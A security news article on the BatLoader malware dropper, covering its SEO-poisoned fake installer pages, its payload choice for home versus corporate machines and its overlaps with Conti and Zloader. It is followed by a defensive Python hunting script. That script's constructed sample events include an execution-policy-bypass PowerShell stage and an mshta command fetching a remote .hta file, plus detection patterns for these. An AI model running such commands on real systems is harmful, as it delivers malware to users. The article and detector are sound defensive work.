Researchers sound the alarm on the dangerous BatLoader malware dropper

A dangerous new malware loader, with built-in logic to determine whether it has landed on a business system or a personal computer, has been rapidly infecting systems around the world in recent months.

VMware Carbon Black researchers are tracking the threat, dubbed BatLoader, and say its operators are using the dropper to distribute a variety of malware, including a banking Trojan, an information stealer and the Cobalt Strike post-exploitation toolkit, on victim systems. The threat actor’s tactic has been to host the malware on compromised websites and lure users to those sites with search engine optimization (SEO) poisoning.

Living off the Land

BatLoader relies heavily on batch scripts and PowerShell to gain a foothold on a victim machine and download other malware onto it. That reliance on native tooling is what has made the campaign difficult to detect and block, especially in its early stages, analysts at VMware Carbon Black’s managed detection and response (MDR) team said in a report released Nov. 14.

VMware said its Carbon Black MDR team had observed 43 successful infections in the past 90 days, in addition to numerous unsuccessful attempts in which a victim downloaded the initial infection file but did not execute it. Nine of the victims were organizations in the business services sector, seven were financial services companies and five were manufacturers. Other victims included organizations in the education, retail, IT and healthcare sectors.

On November 9, eSentire said its threat hunting team had observed the BatLoader operator luring victims to websites masquerading as download pages for popular commercial software such as LogMeIn, Zoom, TeamViewer and AnyDesk. The threat actor distributed links to these websites through ads that appeared prominently in search engine results when users searched for one of these products.

The security vendor said that in an incident in late October, an eSentire customer landed on a fake LogMeIn download page and downloaded a Windows installer that, among other things, profiles the system and uses that information to retrieve a second-stage payload.

“What makes BatLoader interesting is that it has built-in logic that determines whether the victim’s computer is a personal computer or a corporate computer,” says Keegan Keplinger, head of research and reporting at eSentire’s Threat Response Unit (TRU). “Then it drops the right type of malware for the situation.”

Selective payload delivery

For example, if BatLoader lands on a personal computer, it downloads the Ursnif banking Trojan and the Vidar information stealer. If it lands on a corporate or domain-joined computer, it downloads Cobalt Strike and the Syncro remote monitoring and management tool in addition to the banking Trojan and the information stealer.

“If BatLoader lands on a personal computer, it will proceed with fraud, information theft and banking-based payloads like Ursnif,” says Keplinger. “If BatLoader detects that it is in an organizational environment, it will proceed with intrusion tools such as Cobalt Strike and Syncro.”

Keplinger says eSentire has seen “many” recent cyberattacks using BatLoader. Most are opportunistic and affect anyone searching for popular, trusted free software tools.

“To get in front of organizations, BatLoader leverages poisoned ads so that when employees search for trusted free software, like LogMeIn and Zoom, they land on sites controlled by the attackers that offer BatLoader.”

Overlaps with Conti, Zloader

VMware Carbon Black said that while several aspects of the BatLoader campaign are unique, several attributes of the attack chain bear a resemblance to the Conti ransomware operation.

The overlaps include an IP address that the Conti group used in a campaign exploiting the Log4j vulnerability, and the use of a remote management tool called Atera that Conti has used in previous operations.

In addition to the similarities to Conti, BatLoader also has several overlaps with Zloader, a banking Trojan that appears to be derived from the Zeus banking Trojan of the early 2000s, the security vendor said. The biggest similarities include the use of SEO poisoning to lure victims to malware-laden websites, the use of Windows Installer to establish an initial foothold, and the use of PowerShell, batch scripts and other native OS binaries throughout the attack chain.

Mandiant was the first to report on BatLoader. In a February blog post, the security vendor said it had observed a threat actor using themes such as “free installation of productivity apps” and “installation of free software development tools” as SEO keywords to draw users to download sites.

“That initial BatLoader compromise was the beginning of a multi-stage infection chain that provides the attackers with a foothold inside the target organization,” Mandiant said. The attackers used each stage to set up the next phase of the attack chain, using tools such as PowerShell, Msiexec.exe and Mshta.exe to evade detection.
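The tradecraft this article describes (batch and PowerShell stages, Windows Installer as the initial-access vehicle, Msiexec.exe and Mshta.exe in the chain) is what a detection engineer would hunt for in process-creation telemetry. The following Python is an added example written for this page; it is not code from the article or from VMware Carbon Black, eSentire or Mandiant. The key="value" log format, the field names, the file paths, the installer.invalid host and every sample event are constructed for illustration, and the heuristics are generic living-off-the-land indicators rather than BatLoader-specific signatures.

```python
"""
Hunt for BatLoader-style living-off-the-land chains in process-creation telemetry.

Added example for this page; not code from the article or from the vendors it cites.
It flags the script hosts the article names (powershell.exe, cmd.exe, mshta.exe)
that descend from a Windows Installer run (msiexec.exe), execute a stage out of a
user-writable directory, bypass the PowerShell execution policy, or pull remote
content via mshta. The event format and all sample events below are constructed.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, Iterable, List

# Native binaries the article names as the loader's script hosts.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
# Windows Installer, the initial-access vehicle in the campaign described.
INSTALLER = "msiexec.exe"
# Directories where a user-downloaded installer would drop batch / PowerShell stages.
USER_WRITABLE = re.compile(
    r"\\(?:Users\\[^\\]+\\(?:Downloads|AppData\\Local\\Temp)|ProgramData)\\", re.I
)
EXEC_POLICY_BYPASS = re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I)
REMOTE_URL = re.compile(r"https?://", re.I)


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


@dataclass
class Finding:
    pid: int
    image: str
    reasons: List[str] = field(default_factory=list)


def parse_event(line: str) -> ProcEvent:
    """Parse one key="value" process-creation record (constructed format)."""
    fields = dict(re.findall(r'(\w+)="([^"]*)"', line))
    return ProcEvent(int(fields["pid"]), int(fields["ppid"]), fields["image"], fields["cmdline"])


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def ancestors(event: ProcEvent, by_pid: Dict[int, ProcEvent], max_depth: int = 5) -> Iterable[ProcEvent]:
    """Walk up the parent chain, bounded and cycle-safe (pids get reused on Windows)."""
    seen = set()
    current = event
    while current.ppid in by_pid and current.ppid not in seen and len(seen) < max_depth:
        seen.add(current.ppid)
        current = by_pid[current.ppid]
        yield current


def find_suspicious_chains(lines: Iterable[str]) -> List[Finding]:
    events = [parse_event(line) for line in lines if line.strip()]
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        image = basename(e.image)
        if image not in SCRIPT_HOSTS:
            continue
        reasons = []
        installer = next((a for a in ancestors(e, by_pid) if basename(a.image) == INSTALLER), None)
        if installer:
            reasons.append(f"descends from Windows Installer (pid {installer.pid})")
        if USER_WRITABLE.search(e.cmdline):
            reasons.append("runs a stage from a user-writable path")
        if image in ("powershell.exe", "pwsh.exe") and EXEC_POLICY_BYPASS.search(e.cmdline):
            reasons.append("PowerShell execution policy bypass")
        if image == "mshta.exe" and REMOTE_URL.search(e.cmdline):
            reasons.append("mshta.exe loading remote content")
        if reasons:
            findings.append(Finding(e.pid, image, reasons))
    return findings


# Constructed sample telemetry: a fake-installer chain plus one benign PowerShell run.
SAMPLE_EVENTS = [
    'pid="1200" ppid="900" image="C:\\Windows\\explorer.exe" cmdline="explorer.exe"',
    'pid="1300" ppid="1200" image="C:\\Windows\\System32\\msiexec.exe" '
    'cmdline="msiexec.exe /i C:\\Users\\jdoe\\Downloads\\LogMeIn-Setup.msi"',
    'pid="1310" ppid="1300" image="C:\\Windows\\System32\\cmd.exe" '
    'cmdline="cmd.exe /c C:\\Users\\jdoe\\AppData\\Local\\Temp\\install.bat"',
    'pid="1320" ppid="1310" image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'cmdline="powershell.exe -ep bypass -f C:\\Users\\jdoe\\AppData\\Local\\Temp\\stage2.ps1"',
    'pid="1330" ppid="1310" image="C:\\Windows\\System32\\mshta.exe" '
    'cmdline="mshta.exe https://installer.invalid/update.hta"',
    'pid="1400" ppid="1200" image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'cmdline="powershell.exe Get-Process"',
]

if __name__ == "__main__":
    for f in find_suspicious_chains(SAMPLE_EVENTS):
        print(f"pid {f.pid} {f.image}: " + "; ".join(f.reasons))
```

On real telemetry, feed the function Sysmon Event ID 1 or EDR process-creation records converted to this shape. Legitimate installers also spawn cmd.exe and PowerShell from msiexec.exe, so the installer-ancestry reason alone is a hunting lead rather than an alert; the combination with an execution-policy bypass, a stage in a temp directory, or mshta pulling a remote file is what raises the confidence, which is why the reasons are returned separately for scoring.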


About the Author: Ted Simmons
